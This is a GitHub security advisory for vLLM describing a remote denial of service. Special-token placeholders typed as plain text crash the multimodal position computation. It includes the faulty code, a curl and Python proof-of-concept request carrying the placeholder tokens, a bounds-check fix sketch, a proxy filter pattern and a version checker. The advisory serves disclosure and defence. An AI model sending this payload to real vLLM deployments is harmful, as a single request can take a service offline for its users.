MEDIUM 6.5

GHSA-hpv8-x276-m59f

vLLM Vulnerable to Remote DoS via Special-Token Placeholders

Details

## Summary

This report describes a token injection vulnerability in vLLM’s multimodal processing. Text-only prompts from unauthenticated users that spell out special tokens are interpreted as control tokens. Image and video placeholder sequences supplied without matching data cause vLLM to index into empty grids during input-position computation, which raises an unhandled `IndexError` and terminates the worker or degrades availability. Multimodal paths that rely on `image_grid_thw`/`video_grid_thw` are affected.

Severity: High (remote DoS). Reproduced on vLLM 0.10.0 with Qwen2.5-VL.

## Details

- Affected component: multimodal input position computation.
- File/functions (paths are indicative):
  - `vllm/model_executor/layers/rotary_embedding.py`
  - `get_input_positions_tensor(...)`
  - `_vl_get_input_positions_tensor(...)`
- Failure mechanism:
  - The code counts detected vision tokens and then indexes `video_grid_thw`/`image_grid_thw` accordingly.
  - When user input carries placeholder tokens but no actual multimodal payload, these grids are empty. The code does not bounds-check before indexing.

Representative snippet (context):

```python
# vllm/model_executor/layers/rotary_embedding.py
@classmethod
def _vl_get_input_positions_tensor(
    cls,
    input_tokens,
    hf_config,
    image_grid_thw,
    video_grid_thw,
    ...,
):
    # detect video tokens
    video_nums = (vision_tokens == video_token_id).sum()
    # later in processing
    t, h, w = (
        video_grid_thw[video_index][0],  # IndexError if no video data
        video_grid_thw[video_index][1],
        video_grid_thw[video_index][2],
    )
```
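The missing bounds check can be illustrated with a small, self-contained sketch. It is not the upstream fix: `lookup_grid`, `unguarded_lookup`, and `MissingMultimodalDataError` are hypothetical names, and plain Python lists stand in for the grid tensors. It only shows how checking the index first turns the unhandled `IndexError` into a validation error that a server could reject per request.

```python
from typing import Optional, Sequence, Tuple


class MissingMultimodalDataError(ValueError):
    """Hypothetical error: a placeholder token has no matching grid entry."""


def unguarded_lookup(grid_thw, index):
    """Toy version of the indexing pattern in the snippet above."""
    return grid_thw[index][0], grid_thw[index][1], grid_thw[index][2]


def lookup_grid(
    grid_thw: Optional[Sequence[Sequence[int]]], index: int, kind: str
) -> Tuple[int, int, int]:
    """Return (t, h, w) for one vision item, checking bounds first."""
    available = 0 if grid_thw is None else len(grid_thw)
    if index < 0 or index >= available:
        # Placeholder tokens were present, but no payload backs this item.
        raise MissingMultimodalDataError(
            f"prompt references {kind} item {index}, "
            f"but only {available} {kind} grid entries were supplied"
        )
    t, h, w = grid_thw[index]
    return int(t), int(h), int(w)
```

With an empty grid, `unguarded_lookup([], 0)` raises `IndexError`, while `lookup_grid([], 0, "video")` raises the dedicated error type that a caller can map to a client error.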

Abbreviated call path:

```
OpenAI API request
→ vllm.v1.engine.core: step/execute_model
→ vllm.v1.worker.gpu_model_runner: _update_states/execute_model
→ vllm.model_executor.layers.rotary_embedding: get_input_positions_tensor
→ _vl_get_input_positions_tensor
→ IndexError: list index out of range
```

## PoC

### Environment

- vLLM: 0.10.0
- Model: Qwen/Qwen2.5-VL-3B-Instruct
- Launch server:

```bash
python -m vllm.entrypoints.openai.api_server \
  --model Qwen/Qwen2.5-VL-3B-Instruct \
  --port 8000
```

### Request (text-only, no image/video data)

```bash
cat > request.json <<'JSON'
{
  "model": "Qwen/Qwen2.5-VL-3B-Instruct",
  "messages": [
    {
      "role": "user",
      "content": [
        {
          "type": "text",
          "text": "what's in picture <|vision_start|><|image_pad|><|vision_end|>"
        }
      ]
    }
  ]
}
JSON

curl -s http://127.0.0.1:8000/v1/chat/completions \
  -H 'Content-Type: application/json' \
  --data @request.json
```
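For test harnesses that prefer Python over `curl`, the same request can be sketched with the standard library only. The helper names `build_payload` and `send` are hypothetical; the URL, model name, and prompt text are copied from the PoC above. This is intended only for checking a server you operate, for example to confirm that a patched build no longer returns HTTP 500.

```python
import json
import urllib.error
import urllib.request

MODEL = "Qwen/Qwen2.5-VL-3B-Instruct"
URL = "http://127.0.0.1:8000/v1/chat/completions"
PROMPT = "what's in picture <|vision_start|><|image_pad|><|vision_end|>"


def build_payload(model: str = MODEL, text: str = PROMPT) -> dict:
    """Build the text-only chat request from the PoC (no image/video part)."""
    return {
        "model": model,
        "messages": [
            {"role": "user", "content": [{"type": "text", "text": text}]}
        ],
    }


def send(payload: dict, url: str = URL, timeout: float = 30.0) -> int:
    """POST the payload and return the HTTP status code."""
    request = urllib.request.Request(
        url,
        data=json.dumps(payload).encode("utf-8"),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    try:
        with urllib.request.urlopen(request, timeout=timeout) as response:
            return response.status
    except urllib.error.HTTPError as err:
        # 4xx/5xx responses arrive as HTTPError; the status code is what matters.
        return err.code
```

Calling `send(build_payload())` against a local test instance returns the status code, which can then be compared with the observed result described in this report.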

### Observed result

- HTTP 500; logs show `IndexError: list index out of range` from `_vl_get_input_positions_tensor(...)`.
- In some deployments, the worker exits and capacity remains reduced until manual restart.

## Impact

- Type: Token injection leading to remote denial of service (unauthenticated). A single request can trigger the fault.
- Scope: Any vLLM deployment that serves VLMs and accepts raw user text via OpenAI-compatible endpoints (self-hosted or proxied/managed fronts).
- Effect: Request → unhandled exception in position computation → worker termination / service unavailability.
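For deployments that sit behind a proxy and cannot upgrade right away, one conceivable stopgap is to screen user text for placeholder spellings before it reaches vLLM. The sketch below is an assumption-laden illustration, not part of the advisory's fix: `find_placeholder_text` is a hypothetical helper, and the pattern covers only the three tokens that appear in the PoC. A real filter would need the complete special-token list for the served model.

```python
import re
from typing import Any, Dict, List

# Spellings taken from the PoC request; other models may use different
# placeholder tokens (assumption: this list is incomplete).
PLACEHOLDER_PATTERN = re.compile(r"<\|(?:vision_start|vision_end|image_pad)\|>")


def find_placeholder_text(messages: List[Dict[str, Any]]) -> List[str]:
    """Return every placeholder spelling found in user-supplied text parts."""
    hits: List[str] = []
    for message in messages:
        content = message.get("content")
        if isinstance(content, str):
            texts = [content]
        elif isinstance(content, list):
            texts = [
                part["text"]
                for part in content
                if isinstance(part, dict)
                and part.get("type") == "text"
                and isinstance(part.get("text"), str)
            ]
        else:
            texts = []
        for text in texts:
            hits.extend(PLACEHOLDER_PATTERN.findall(text))
    return hits
```

A proxy could reject the request with a client error whenever the returned list is non-empty, since legitimate multimodal input arrives as structured content parts rather than as literal token text.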

## Fixes

* Changes associated with https://github.com/vllm-project/vllm/issues/32656

## Credits

- Pengyu Ding (Infra Security, Ant Group)
- Ziteng Xu (Infra Security, Ant Group)

Affected packages

PyPI / vllm

Introduced in: 0.6.1
Fixed in: 0.20.0

Fix: `pip install --upgrade 'vllm>=0.20.0'`
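A quick way to check an environment against the version range listed above is sketched here. It assumes the range is half-open, from 0.6.1 inclusive to 0.20.0 exclusive, and compares only the numeric release segment, so pre-release builds such as release candidates of 0.20.0 are treated like the final release. The function names are hypothetical.

```python
import re
from importlib import metadata
from typing import Optional, Tuple

INTRODUCED = (0, 6, 1)  # "Introduced in" from this advisory
FIXED = (0, 20, 0)      # "Fixed in" from this advisory


def release_tuple(version: str) -> Tuple[int, ...]:
    """Parse the leading numeric release segment, e.g. '0.10.0+cu118' -> (0, 10, 0)."""
    match = re.match(r"\d+(?:\.\d+)*", version.strip())
    if match is None:
        raise ValueError(f"unrecognized version string: {version!r}")
    parts = tuple(int(piece) for piece in match.group().split("."))
    # Pad short versions such as '0.7' to three components.
    return parts + (0,) * (3 - len(parts))


def is_affected(version: str) -> bool:
    """True if the version falls in the assumed range [0.6.1, 0.20.0)."""
    return INTRODUCED <= release_tuple(version) < FIXED


def installed_vllm_affected() -> Optional[bool]:
    """Check the installed vllm package; None if vllm is not installed."""
    try:
        return is_affected(metadata.version("vllm"))
    except metadata.PackageNotFoundError:
        return None
```

For example, `is_affected("0.10.0")` is true for the version used in the PoC, while `is_affected("0.20.0")` is false.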
